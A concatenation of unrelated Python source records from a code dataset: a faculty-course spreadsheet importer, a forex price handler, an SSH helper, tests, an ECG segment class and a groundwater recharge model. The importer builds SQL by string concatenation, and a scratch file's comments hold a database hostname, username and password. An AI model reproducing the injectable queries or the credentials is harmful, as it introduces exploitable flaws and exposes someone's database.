pd.set_option('display.width', 1000)\ntry:\n file_path = sys.argv[1]\n df = pd.read_excel(file_path)\nexcept:\n print('File not found')\n failed = pd.DataFrame({'Errors': ['File not found', sys.exc_info()[0]]})\n failed.to_excel('excels/failed_'+sys.argv[1]+'.xlsx', index=False)\n print(count)\n sys.exit(1)\n\ntry:\n expected_headers = ['Sr. No.', 'Dept.', 'Initials', 'Name/s of Author /s / Faculty', 'Name of Course', 'Start Date', 'End Date', 'Organized By',\n 'Purpose', 'Target Audience', 'Faculty Role', 'Part time / Full time', 'No. of Participants', 'Duration', 'Local / National', 'Sponsor Details']\n file_headers = list(df.columns.values)\n print(expected_headers)\n print(file_headers)\n for i in range(len(expected_headers)):\n if(not expected_headers[i] == file_headers[i]):\n raise KeyError('Header format error in \"' +\n file_headers[i]+'\" Expected \"'+expected_headers[i]+'\"')\n df.dropna(axis=0, how='all', thresh=None, subset=None, inplace=True)\n# print(df.head())\n l = list(df.columns)\n# print(df.iloc[4:6,1])\n for i in l:\n if i[0:3] == '201' or i[0] == '1':\n name = i\n headers = df.iloc[0]\n # print(headers)\n df.columns = headers\n df = df.iloc[1:]\n # print(df.info())\n # print(df.head())\n # print(df.head())\n df = df[df.columns.dropna()]\n df.dropna(subset=[\"Name/s of Author /s / Faculty\"], axis=0, inplace=True)\n # print(df.head(1))\n # print(df.info())\n # print(df.shape[0])\n # df['Sr. No.'] = np.arange(len(df))\n # print(df.isnull().head())\n df.fillna('NA', inplace=True)\n # print(df)\nexcept Exception as e:\n print('Pre-processing error')\n print(sys.exc_info())\n failed = pd.DataFrame(\n {'Errors': ['Pre-processing error', sys.exc_info()[0], e.args]})\n print(failed)\n print(count)\n failed.to_excel('excels/failed_'+sys.argv[1]+'.xlsx', index=False)\n # failed.to_excel('failed_'+sys.argv[1]+'.xlsx',index=False)\n sys.exit(1)\n\nfailed = pd.DataFrame(columns=df.columns)\nfailed['Errors'] = []\n\n# print(df)\n# enter every line into database\nfor i in range(0, df.shape[0]):\n faclist = list(df.iloc[i, 2:])\n\n try:\n # pop initials\n faclist.pop(0)\n\n # separate coauthors\n authors = faclist[0].split(',')\n authname = authors[0].split('.')[-1].strip()\n # print(\"author\"+authname)\n q1 = \"SELECT Fac_ID from facultydetails where F_NAME like '%\"+authname+\"%'\"\n mycursor.execute(q1)\n result = mycursor.fetchone()\n facid = \"\"\n if result and len(result) == 1:\n facid = int(result[0])\n #print('Authname: '+str(authname)+'Facid:'+str(facid))\n if facid == '':\n raise Exception('Fac_ID not found/empty')\n faclist.insert(0, facid)\n # print(faclist)\n # pop faculty name\n faclist.pop(1)\n except Exception as e:\n failed = failed.append(df.iloc[i, :], ignore_index=True)\n failed['Errors'].iloc[-1] = 'Author/ID formatting error\\n' + \\\n str(e.args)\n continue\n\n try:\n # start_date = faclist.pop(2)\n # end_date = faclist.pop(2)\n # if start_date != '' and start_date != 'NA':\n # date_from = datetime.strptime(start_date, '%d-%m-%Y')\n # start_date = datetime.strftime(date_from, '%Y-%m-%d')\n # if end_date != '' and end_date != 'NA':\n # date_to = datetime.strptime(end_date, '%d-%m-%Y')\n # end_date = datetime.strftime(date_to, '%Y-%m-%d')\n # # print(date_str)\n # # faclist.pop(6)\n # faclist.insert(2, start_date)\n # faclist.insert(3, end_date)\n start_date = str(faclist.pop(2))\n end_date = str(faclist.pop(2))\n if start_date != '' and start_date != 'NA':\n date_from = datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')\n #start_date = datetime.strftime(str(date_from), '%Y-%m-%d %H:%M:%S')\n year = date_from.strftime(\"%Y\")\n month = date_from.strftime(\"%m\")\n if end_date != '' and end_date != 'NA':\n date_to = datetime.strptime(end_date, '%Y-%m-%d %H:%M:%S')\n delta = date_to - date_from\n noofdays = delta.days\n noofweeks = int(noofdays)//7\n\n faclist.insert(2, str(date_from))\n faclist.insert(3, str(end_date))\n except Exception as e:\n failed = failed.append(df.iloc[i, :], ignore_index=True)\n failed['Errors'].iloc[-1] = 'Date formatting error\\n' + str(e.args)\n continue\n\n # deal with duration and paricipants null values\n if faclist[10] == 'NA':\n faclist[10] = 0\n if faclist[11] == 'NA':\n faclist[11] = 0\n\n # dealing with sponsor details\n try:\n if faclist[-1] == 'NA':\n faclist.append('not-sponsored')\n else:\n faclist.append('sponsored')\n except Exception as e:\n failed = failed.append(df.iloc[i, :], ignore_index=True)\n failed['Errors'].iloc[-1] = 'Sponsor field formatting error\\n' + \\\n str(e.args)\n continue\n\n # insert course type\n faclist.insert(1,'online')\n\n # print(faclist)\n # mycursor.execute(\"INSERT INTO co_author(p_id,c_name) VALUES (2,'netra')\")\n # print(mycursor.lastrowid)\n\n # check is paper already present\n try:\n c_name = '%'+faclist[2].strip().strip('\"').strip('.')+'%'\n q_check = \"SELECT 1 from online_course_organised where Fac_id=\" + \\\n str(faclist[0])+\" AND Course_Name LIKE '\"+c_name+\"'\"\n # print(q_check)\n result = mycursor.execute(q_check)\n # print('afterrrr')\n result = mycursor.rowcount\n # print(\"RESULT\"+result,end='\\n\\n')\n if result == 0:\n val = tuple(faclist)\n # print(faclist)\n # print(val)\n sql = \"INSERT INTO online_course_organised(Fac_id, type_of_course, Course_Name, Date_From, Date_To, Organised_By, Purpose, Target_Audience, faculty_role, full_part_time, no_of_part, duration, status, name_of_sponsor, sponsored) VALUES (%s, '%s','%s','%s','%s','%s','%s','%s','%s','%s',%s,%s,'%s','%s','%s')\" % val\n # print(sql)\n\n mycursor.execute(sql)\n\n py_connection.mydb.commit()\n count = count+1\n print('E N T R Y P R O C E S S E D')\n else:\n # print(faclist)\n # print(authors)\n print('DUPLICATE ENTRY')\n except Exception as e:\n print('entry not processed'+str(e.args))\n # print(authors)\n # f_series = pd.Series(faclist, index = failed.columns)\n failed = failed.append(df.iloc[i, :], ignore_index=True)\n failed['Errors'].iloc[-1] = 'Entry not processed\\n' + str(e.args)\n continue\n\n\n# print(failed)\nprint(count)\n# status = os.stat('trial.xlsx')\n# print(oct(status.st_mode)[-3:])\n\n# df.to_excel(sys.argv[1], index=False)\nif not failed.empty:\n failed.to_excel('excels/failed_'+sys.argv[1]+'.xlsx', index=False)\n# failed.to_excel('failed_'+sys.argv[1]+'.xlsx', index=False)\n","sub_path":"pandas_ocorganised.py","file_name":"pandas_ocorganised.py","file_ext":"py","file_size_in_byte":7417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"502195604","text":"from .base import AbstractBarPriceHandler\nfrom ..event import BarEvent\n\nimport requests\nfrom collections import deque\nimport six.moves.urllib as urllib\nfrom datetime import datetime, timedelta\n\noanda_request_date_format_string = '%Y-%m-%dT%H:%M:%SZ'\noanda_RFC3339_format = '%Y-%m-%dT%H:%M:%S.000000Z'\n\n\nclass OandaBarPriceHandler(AbstractBarPriceHandler):\n \"\"\"\n OandaBarPriceHandler..\n \"\"\"\n def __init__(self, instrument, granularity,\n start, end,\n daily_alignment=0, alignment_timezone=None,\n warmup_bar_count=0,\n server=None, bearer_token=None,\n events_queue=None):\n if len(instrument) == 6:\n self.instrument = instrument[:3] + \"_\" + instrument[3:]\n else:\n self.instrument = instrument\n self.granularity = granularity\n self.start_date = start\n self.end_date = end\n self.daily_alignment = daily_alignment\n self.alignment_timezone = alignment_timezone\n self.warmup_bar_count = warmup_bar_count\n # self.warmup_bar_counter = warmup_bar_count\n\n self.server = server\n self.bearer_token = \"Bearer %s\" % bearer_token\n self.request_headers = {\n 'Authorization': self.bearer_token,\n 'Connection': 'Keep-Alive',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-type': 'application/x-www-form-urlencoded'\n }\n\n self.events_queue = events_queue\n self.continue_backtest = True\n\n self.next_start_date = start\n self.candle_queue = deque()\n self.last_candle_time = ''\n self.candle_timespan = timedelta(\n seconds=self._granularity_to_seconds()\n )\n\n if warmup_bar_count > 0:\n # request warmup items (note: max 5000)\n\n start_string = self.start_date.strftime(\n oanda_request_date_format_string\n )\n\n url = (\n \"https://\" + self.server + \"/v1/candles\" +\n \"?instrument=\" + urllib.parse.quote_plus(self.instrument) +\n \"&granularity=\" + self.granularity +\n \"&count={}\".format(self.warmup_bar_count) +\n # grab bars up to the start date\n \"&end=\" + urllib.parse.quote_plus(start_string) +\n \"&candleFormat=midpoint\" +\n \"&dailyAlignment={}\".format(self.daily_alignment) +\n \"&alignmentTimezone=\" +\n urllib.parse.quote_plus(self.alignment_timezone)\n )\n response_json = requests.get(url, headers=self.request_headers)\n self.candle_queue.extend(response_json.json()['candles'])\n\n def _granularity_to_seconds(self):\n if self.granularity == 'D':\n return 86400 # Seconds in a day\n return None\n\n def _create_event(self, candle):\n return BarEvent(\n ticker=self.instrument,\n time=candle['time'],\n period=self._granularity_to_seconds(),\n open_price=candle['openMid'],\n high_price=candle['highMid'],\n low_price=candle['lowMid'],\n close_price=candle['closeMid'],\n volume=candle['volume']\n )\n\n def _pop_candle_onto_event_queue(self):\n if len(self.candle_queue) > 0:\n candle = self.candle_queue.popleft()\n bar_event = self._create_event(candle)\n self.events_queue.put(bar_event)\n else:\n self.events_queue.put(None)\n\n def _fetch_more_candles(self):\n\n start_string = self.next_start_date.strftime(\n oanda_request_date_format_string\n )\n\n url = (\n \"https://\" + self.server + \"/v1/candles\" +\n \"?instrument=\" + urllib.parse.quote_plus(self.instrument) +\n \"&granularity=\" + self.granularity +\n \"&count=5000\"\n \"&start=\" + urllib.parse.quote_plus(start_string) +\n \"&candleFormat=midpoint\"\n \"&dailyAlignment=\" + str(self.daily_alignment) +\n \"&alignmentTimezone=\" +\n urllib.parse.quote_plus(self.alignment_timezone)\n )\n\n response_json = requests.get(url, headers=self.request_headers)\n response_dict = response_json.json()\n\n # filter out incomplete and already queued candles\n candles = list(filter(\n lambda x:\n x['complete'] and\n x['time'] > self.last_candle_time and\n x['time'] < self.end_date.strftime(oanda_RFC3339_format),\n response_dict['candles']\n ))\n\n if len(candles) > 0:\n self.candle_queue.extend(candles)\n self.last_candle_time = candles[-1]['time']\n self.next_start_date = datetime.strptime(\n candles[-1]['time'],\n oanda_RFC3339_format\n ) + self.candle_timespan\n else:\n # self.events_queue.put(None)\n\n # either we have to wait for a new candle to become available (live\n # scenario) or we have to jump forward over a gap in candles (e.g.\n # a weekend, back test scenario)\n\n if self.next_start_date + self.candle_timespan > datetime.utcnow():\n return\n\n self.next_start_date += self.candle_timespan * 5000\n if self.next_start_date > self.end_date:\n self.continue_backtest = False\n\n def stream_next(self):\n \"\"\"\n Place the next BarEvent onto the event queue.\n \"\"\"\n if len(self.candle_queue) > 0:\n self._pop_candle_onto_event_queue()\n else:\n if (self.next_start_date > datetime.now() or\n self.next_start_date > self.end_date):\n self.continue_backtest = False\n return\n\n self._fetch_more_candles()\n self._pop_candle_onto_event_queue()\n","sub_path":"qstrader/price_handler/oanda.py","file_name":"oanda.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"464406858","text":"\"\"\"\nhttp请求过程演示\n\"\"\"\n\nfrom socket import *\n\n# tcp套接字 (http-->tcp)\ns = socket()\ns.bind(('0.0.0.0',8000))\ns.listen(3)\n\nc,addr = s.accept()\nprint(\"Connect from\",addr)\n# 获取请求\ndata = c.recv(4096)\nprint(data)\n\n# 返回响应\nresponse = \"\"\"HTTP/1.1 200 OK\nContent-Type:text/html\n\nHello World\n\"\"\"\n\nc.send(response.encode())\n\n\nc.close()\ns.close()","sub_path":"udp传输模型/http_test.py","file_name":"http_test.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"603995784","text":"#!/usr/bin/env python3\nfrom netmiko import ConnectHandler\n\n\"\"\"\n @author: Adrian González Pardo\n @date_update: 23/04/2021\n @github: AdrianPardo99\n\"\"\"\n\n\"\"\"\n @args:\n Es el diccionario que contiene los datos para la conexion\n Es la lista de comandos que va a ejecutar netmiko\n\"\"\"\ndef conectar(cisco,cmd):\n net_connect = ConnectHandler(**cisco)\n net_connect.enable()\n output=[]\n for i in range(len(cmd)):\n output.append(net_connect.send_command(cmd[i]))\n return output\n\n\"\"\"\n A diferencia de la función de arriba esta puede interconectarse con\n routers con routers y no equipo a router, en forma de puente la conexión\n @args:\n Es el diccionario que contiene los datos para la conexion\n Es la lista de comandos que va a ejecutar netmiko\n\"\"\"\ndef conectar_bridge(cisco,cmd):\n print('Intentará crear la conexión con: ', cisco, ' primer instruccion: ', cmd[0])\n net_connect = ConnectHandler(**cisco)\n print('Se hizo la conexión')\n net_connect.enable()\n print('Conexión hecha')\n output=[]\n for i in range(len(cmd)):\n print('Comando a anotar: ', cmd[i])\n output.append(net_connect.send_command_timing(cmd[i]))\n return output\n","sub_path":"ssh_connect.py","file_name":"ssh_connect.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"504620419","text":"# import difflib\n\n\n# a_dict = {\"id\": \"1\", \"name\": \"alexco\", \"address\": \"123 Main Street\", \"email\": \"afdaniels@alexco.com\"}\n# t_dict = {\"id\": \"1\", \"name\": \"alexco\", \"address\": \"123 Main Street\", \"email\": \"afdaniels@alexco.com\"}\n# counter = 0\n\n\n# for k,v in a_dict.items():\n \n# test = t_dict[k]\n\n\n# clean_i = ''.join(e for e in v if e.isalnum())\n# clean_t = ''.join(e for e in test if e.isalnum())\n# sequence = difflib.SequenceMatcher(isjunk=None, a=clean_t, b=clean_i)\n# difference = sequence.ratio()*100\n# difference = round(difference, 1)\n\n# print(clean_i, difference)\n\n# import pymssql\n\n# conn = pymssql.connect(server=\"mtsql17p.westus2.cloudapp.azure.com\", user=\"goldenron\", password=\"@RonPower!@#$!@#$\", database=\"mapptrapdb\")\n# cursor = conn.cursor()\n\n# cursor.execute(\"SELECT top 10 * FROM tblmappviolations\")\n# row = cursor.fetchone()\n\n# conn.close()\n\n# print(row)\n\n\nnumbers = list(range(1, 100))\n\ndef Fizz(i):\n if i % 5 == 0 and i % 3 == 0: \n print('FizzBizz')\n elif i % 3 == 0:\n print('Fizz')\n elif i % 5 == 0:\n print('Bizz')\n else:\n print(i)\n\nfor x in numbers:\n Fizz(x)\n\n\n\n","sub_path":"DiffMatching/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433933854","text":"'''' unit testing for graph_transversal module'''\nimport unittest\nfrom graphs.model import DirectedGraph\nimport graphs.transversal.bfs as bfs\n\n\nclass TestDirectedGraphTransversal(unittest.TestCase):\n ''' test bfs for directed graph '''\n def test_directed_bfs(self):\n '''test standard bfs for directed graph case'''\n graph = DirectedGraph()\n graph.add_edge(0, 1)\n graph.add_edge(0, 2)\n graph.add_edge(1, 2)\n graph.add_edge(2, 4)\n graph.add_edge(3, 2)\n graph.add_edge(3, 5)\n graph.add_edge(4, 3)\n graph.add_edge(5, 0)\n lst = bfs.directed_bfs(graph)\n self.assertEqual(lst, [0, 1, 2, 4, 3, 5])\n\n def test_directed_bfs_only1(self):\n '''test bfs for directed graph case with only one edge'''\n graph = DirectedGraph()\n graph.add_edge(0, 1)\n lst = bfs.directed_bfs(graph)\n self.assertEqual(lst, [0, 1])\n\n def test_directed_bfs_empty(self):\n '''test bfs for directed graph case with only one edge'''\n graph = DirectedGraph()\n lst = bfs.directed_bfs(graph)\n self.assertEqual(lst, [])\n","sub_path":"tests/transversal/test_bfs.py","file_name":"test_bfs.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297824722","text":"#External modules\nimport hashlib\nimport sys\n\ndef get_file_md5(fname, show_prints):\n #Reference: https://stackoverflow.com/questions/3431825/generating-an-md5-checksum-of-a-file\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n hash_value = hash_md5.hexdigest()\n if show_prints:\n print(f'Hash value generated. Hash {hash_value}', file=sys.stdout)\n return hash_value\n","sub_path":"md5_generator.py","file_name":"md5_generator.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608154720","text":"import numpy as np\nfrom scipy.signal import argrelextrema\n\n\nclass Segment:\n \"\"\"\n A segment is a section of an ECG signal between two neighbouring R-peaks\n\n ...\n \n Attributes\n ----------\n no_of_segments : int\n a int representing the number of segemnts to overlay\n \n Methods\n -------\n combining_segments()\n Combines multiple segments, overlayed on each other\n find_features_lower()\n Finds the lower unique features of a segment\n find_features_higher()\n Finds the higher unique features of a segment\n \"\"\"\n\n no_of_segments = 5\n\n def __init__(self, bio_signal):\n \"\"\"\n Parameters\n ----------\n bio_signal : BiometricSignal\n An ECG signal object\n combined_seg : numpy.ndarray\n Contains multiple segments overlayed on each other \n features_lower() : tuple\n The lower side unique features of a segment\n features_higher() : tuple\n The higher side unique features of a segment\n \"\"\"\n\n self.bio_signal = bio_signal\n self.combined_seg = self.combining_segments()\n self.features_lower = self.find_features_lower()\n self.features_higher = self.find_features_higher()\n\n def combining_segments(self):\n r\"\"\"Combines multiple segments, overlayed on one another\n\n This function combines multiple neighbouring R-peaks and overlays them\n to form a single segment. This an average over multiple segments.\n \n Returns\n -------\n combined_seg : numpy.ndarray\n A numpy array containing multiple segments overlayed on one another\n \"\"\"\n\n combined_seg_does_not_exist = True\n smallest_seg = None\n\n for i in range(0, self.no_of_segments):\n segment_start = self.bio_signal.r_peaks[0][i]\n segment_end = self.bio_signal.r_peaks[0][i + 1]\n\n extracted_segment = self.bio_signal.standardised_signal[\n segment_start:segment_end\n ]\n if smallest_seg == None:\n smallest_seg = len(extracted_segment)\n elif len(extracted_segment) < smallest_seg:\n smallest_seg = len(extracted_segment)\n\n if combined_seg_does_not_exist:\n # adds additional zeros to the end of the first segment\n # this is to prevent a crash as segments may have differnet lengths\n combined_seg = np.zeros(len(extracted_segment) + 100)\n combined_seg_does_not_exist = False\n for j in range(0, len(extracted_segment)):\n combined_seg[j] = combined_seg[j] + extracted_segment[j]\n\n combined_seg = np.trim_zeros(combined_seg)\n combined_seg = combined_seg[0:smallest_seg]\n return combined_seg\n\n def find_features_lower(self):\n r\"\"\"Finds the lower unique features of a segment\n\n This function uses argrelextrema, part of SciPy. Argrelextrema\n calculates the relative extrema of data, this means it examines\n data at either side of a point on the segment to identify variation.\n When if finds broad variations between points, it considers it unique, \n labels that point as a feature and stores it in a tuple.\n \n Returns\n -------\n features_lower : tuple\n A tuple containing the positions of lower unique features. \n \"\"\"\n\n features_lower = argrelextrema(self.combined_seg, np.less, order=5)\n self.features_lower = (features_lower[0], self.combined_seg[features_lower[0]])\n return self.features_lower\n\n def find_features_higher(self):\n r\"\"\"Finds the higher unique features of a segment\n\n This function uses argrelextrema, part of SciPy. Argrelextrema\n calculates the relative extrema of data, this means it examines\n data at either side of a point on the segment to identify variation.\n When if finds broad variations between points, it considers it unique, \n labels that point as a feature and stores it in a tuple.\n \n Returns\n -------\n features_higher : tuple\n A tuple containing the positions of higher unique features. \n \"\"\"\n\n features_higher = argrelextrema(self.combined_seg, np.greater, order=5)\n self.features_higher = (\n features_higher[0],\n self.combined_seg[features_higher[0]],\n )\n return self.features_higher\n","sub_path":"Segment.py","file_name":"Segment.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403637515","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 10 11:20:45 2019\r\n\r\n@author: USER\r\n\"\"\"\r\nimport os\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PyQt5.QtWidgets import QProgressBar\r\nfrom models.exceptions import InvalidExtensionError, IncompleteInitialParameters, InvalidModelFile\r\nfrom models.utilities import printProgressBar\r\n\r\n\r\nclass SambaModel():\r\n \r\n EXPECTED_INPUT_VARIABLES = ('day','month','year','J','Rain','ETo')\r\n EXTENSIONS = ('.xlsx','.xls')\r\n INITIAL_GENERATED_VARIABLES = (\"Kc's\",'Zr','TAW','RAW','PE')\r\n GENERATED_VARIABLES = INITIAL_GENERATED_VARIABLES + ('RunCte','Runoff','Ks','AWE','AE','NSS','SMD','Rec',\"SMD'\")\r\n FINAL_DAY = None\r\n \r\n def __init__(self,model_path,**kwargs):\r\n \r\n if os.path.splitext(model_path)[1] in self.EXTENSIONS:\r\n self.model = pd.read_excel(model_path) if pd.read_excel(model_path).iloc[0].all() else None # checks if dummy row is appended to the model file \r\n self.crop_stages = kwargs['crop_stages']\r\n self.max_root_depth = kwargs['max_root_depth']\r\n self.soil = kwargs['soil']\r\n self.crop_coefficient = kwargs['crop_coefficient']\r\n self.run_off_matrix = kwargs['run_off_matrix']\r\n self.model_constant_params = kwargs['model_constant_params']\r\n self.crop_duration = kwargs['crop_duration']\r\n \r\n \r\n if self.model is None:\r\n raise InvalidModelFile('Dummy row not appended to model file')\r\n else:\r\n self.FINAL_DAY = self.model.index[-1]\r\n \r\n # initializaing the dummy row in the dataframe\r\n for variable in self.GENERATED_VARIABLES:\r\n self.model[variable] = None\r\n self.model[variable][0] = 0\r\n \r\n \r\n # setting the initial smd value\r\n self.model[\"SMD'\"][0] = self.model_constant_params['initial_smd']\r\n self.model[\"SMD'\"][1] = self.model_constant_params['initial_smd']\r\n else:\r\n raise InvalidExtensionError('File extension invalid')\r\n \r\n \r\n def generate_model(self):\r\n \r\n print('Loading......')\r\n self.generate_initial_variables()\r\n \r\n try:\r\n for i in self.model.index:\r\n index = i+1\r\n printProgressBar(index,len(self.model.index),prefix = 'Progress:', suffix = 'Complete',length=50)\r\n self.model[self.GENERATED_VARIABLES[5]][index] = self.get_run_off_coefficient(index)\r\n self.model[self.GENERATED_VARIABLES[6]][index] = self.get_runoff(index)\r\n self.model[self.GENERATED_VARIABLES[7]][index] = self.get_ks(index)\r\n self.model[self.GENERATED_VARIABLES[8]][index] = self.get_average_water_evapotranspiration(index)\r\n self.model[self.GENERATED_VARIABLES[9]][index] = self.get_average_evatranspiration(index)\r\n self.model[self.GENERATED_VARIABLES[10]][index] = self.get_nss(index)\r\n self.model[self.GENERATED_VARIABLES[11]][index] = self.get_smd(index)\r\n self.model[self.GENERATED_VARIABLES[12]][index] = self.get_recharge(index)\r\n self.model[self.GENERATED_VARIABLES[13]][index+1] = self.get_smd_prime(index) \r\n except Exception:\r\n pass\r\n finally:\r\n self.model[self.GENERATED_VARIABLES[5]][self.FINAL_DAY] = self.get_run_off_coefficient(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[6]][self.FINAL_DAY] = self.get_runoff(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[7]][self.FINAL_DAY] = self.get_ks(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[8]][self.FINAL_DAY] = self.get_average_water_evapotranspiration(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[9]][self.FINAL_DAY] = self.get_average_evatranspiration(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[10]][self.FINAL_DAY] = self.get_nss(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[11]][self.FINAL_DAY] = self.get_smd(self.FINAL_DAY)\r\n self.model[self.GENERATED_VARIABLES[12]][self.FINAL_DAY] = self.get_recharge(self.FINAL_DAY)\r\n \r\n # delete the first dummy row\r\n self.model = self.model.drop(self.model.index[0])\r\n \r\n def generate_initial_variables(self):\r\n \r\n \r\n '''\r\n This generates the variablels that are not dependent on initial SMD value\r\n \r\n @ variables\r\n - Kc's :\r\n - Zr :\r\n - TAW : Tatal Average Water\r\n - RAW : \r\n - PE : Potential Evapotranspiration\r\n '''\r\n \r\n if set(self.EXPECTED_INPUT_VARIABLES).issubset(set(self.model.columns)):\r\n \r\n for variable_column in self.INITIAL_GENERATED_VARIABLES: \r\n \r\n if variable_column == \"Kc's\":\r\n julian_days = self.model['J'].values\r\n for index,julian_day in list(enumerate(julian_days)):\r\n if self.crop_stages['planting']<= julian_day < self.crop_stages['development']:\r\n self.model[variable_column][index] = self.crop_coefficient['middle']\r\n elif self.crop_stages['development']<= julian_day < self.crop_stages['middle']:\r\n self.model[variable_column][index] = self.crop_coefficient['initial']+(julian_day-self.crop_stages['development'])/self.crop_duration['development']*(self.crop_coefficient['middle']-self.crop_coefficient['initial'])\r\n elif self.crop_stages['middle']<=julian_day= taw:\r\n ks_value = 0\r\n \r\n elif smd_prime > taw * self.model_constant_params['depletion_factor']:\r\n ks_value = round((taw-smd_prime)/(taw-taw*self.model_constant_params['depletion_factor']),2)\r\n\r\n else:\r\n ks_value = 1\r\n \r\n return ks_value\r\n \r\n def get_average_water_evapotranspiration(self,index):\r\n \r\n \r\n '''\r\n returns the average water evapotranspiration for a particular julian day \r\n '''\r\n \r\n rainfall_intensity = self.model['Rain'][index]\r\n runoff = self.model['Runoff'][index]\r\n nss = 0 if self.model['NSS'][index-1] is None else self.model['NSS'][index-1]\r\n smd_prime = self.model[\"SMD'\"][index-1]\r\n awe_value = None\r\n \r\n if smd_prime > 0:\r\n awe_value = rainfall_intensity - runoff + nss\r\n else:\r\n awe_value = rainfall_intensity - runoff \r\n return awe_value\r\n \r\n \r\n def get_average_evatranspiration(self,index):\r\n \r\n '''\r\n returns the average evapotranspiration for a particular julian day \r\n '''\r\n \r\n \r\n awe_value = self.model['AWE'][index]\r\n pe_value = self.model['PE'][index]\r\n taw_value = self.model['TAW'][index]\r\n ks_value = self.model['Ks'][index]\r\n smd_prime = self.model[\"SMD'\"][index]\r\n depletion_factor = self.model_constant_params['depletion_factor']\r\n ae_value = None\r\n \r\n if smd_prime < taw_value * depletion_factor:\r\n ae_value = pe_value \r\n elif awe_value >= pe_value:\r\n ae_value = pe_value\r\n elif smd_prime >= taw_value :\r\n ae_value = awe_value\r\n elif smd_prime < taw_value:\r\n ae_value = awe_value + ks_value*(pe_value - awe_value)\r\n \r\n return ae_value\r\n \r\n \r\n def get_nss(self,index):\r\n \r\n '''\r\n returns the nss for a particular julian day \r\n '''\r\n \r\n awe_value = self.model['AWE'][index]\r\n ae_value = self.model['AE'][index]\r\n smd_prime = self.model[\"SMD'\"][index]\r\n nss_value = None\r\n nss_fraction = self.model_constant_params['nss_fraction']\r\n \r\n if awe_value - ae_value > smd_prime:\r\n nss_value = 0\r\n else:\r\n nss_value = max((awe_value-ae_value)*nss_fraction,0)\r\n \r\n return nss_value\r\n \r\n def get_smd(self,index):\r\n \r\n '''\r\n returns the smd value for a particular julian day \r\n '''\r\n awe_value = self.model['AWE'][index]\r\n nss_value = self.model['NSS'][index]\r\n ae_value = self.model['AE'][index]\r\n smd_prime = self.model[\"SMD'\"][index] \r\n \r\n smd_value = smd_prime+ae_value - awe_value + nss_value\r\n return smd_value \r\n \r\n def get_recharge(self,index):\r\n \r\n \r\n '''\r\n returns the recharge value for a particular julian day \r\n '''\r\n \r\n smd_value = self.model['SMD'][index]\r\n nss_value = self.model['NSS'][index]\r\n recharge = None\r\n \r\n if smd_value < 0:\r\n recharge = ((-1)*smd_value)+nss_value\r\n else:\r\n recharge = 0\r\n \r\n return recharge\r\n \r\n def get_smd_prime(self,index):\r\n \r\n '''\r\n returns the smd for the next julian day \r\n '''\r\n \r\n smd_prime = None\r\n smd_value = self.model['SMD'][index]\r\n recharge = self.model['Rec'][index]\r\n \r\n if smd_value < 0:\r\n smd_prime = 0\r\n else:\r\n smd_prime = smd_value + recharge\r\n \r\n return smd_prime\r\n \r\n def load_visualization(self,visualization_type):\r\n \r\n if visualization_type == 'SMD':\r\n julian_days = self.model['J'].values\r\n runoff = self.model['Runoff'].values\r\n taw = self.model['TAW'].values\r\n smd = self.model['SMD'].values\r\n rainfall = self.model['Rain'].values\r\n \r\n return { 'visualization_type':visualization_type,\r\n 'julian_days':julian_days,\r\n 'runoff':runoff,\r\n 'taw':taw,\r\n 'smd':smd,\r\n 'rainfall':rainfall}\r\n \r\n \r\n elif visualization_type == 'Monthly precipitation' :\r\n monthly_precipitation = {}\r\n months = ('Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec')\r\n \r\n for index, month in enumerate(months):\r\n monthly_precipitation[month] = sum(self.model.loc[self.model['month'] == index + 1].Rain)\r\n \r\n y_pos = np.arange(len(months))\r\n \r\n return {'visualization_type':visualization_type,\r\n 'months':months,\r\n 'y_pos':y_pos,\r\n 'monthly_precipitation':monthly_precipitation}\r\n \r\n \r\n elif visualization_type == 'Evapotranspiration':\r\n julian_days = self.model['J'].values\r\n eto = self.model['ETo'].values\r\n pe = self.model['PE'].values\r\n ae = self.model['AE'].values\r\n \r\n return{'visualization_type':visualization_type,\r\n 'julian_days':julian_days,\r\n 'eto':eto,\r\n 'pe':pe,\r\n 'ae':ae}\r\n elif visualization_type == 'Recharge/Runoff':\r\n julian_days = self.model['J'].values\r\n recharge = self.model['Rec'].values\r\n runoff = self.model['Runoff'].values\r\n \r\n return {'visualization_type':visualization_type,\r\n 'julian_days':julian_days,\r\n 'recharge':recharge,\r\n 'runoff':runoff}\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"models/model_v2.py","file_name":"model_v2.py","file_ext":"py","file_size_in_byte":16587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58431848","text":"from django import forms\nfrom . import models\nfrom 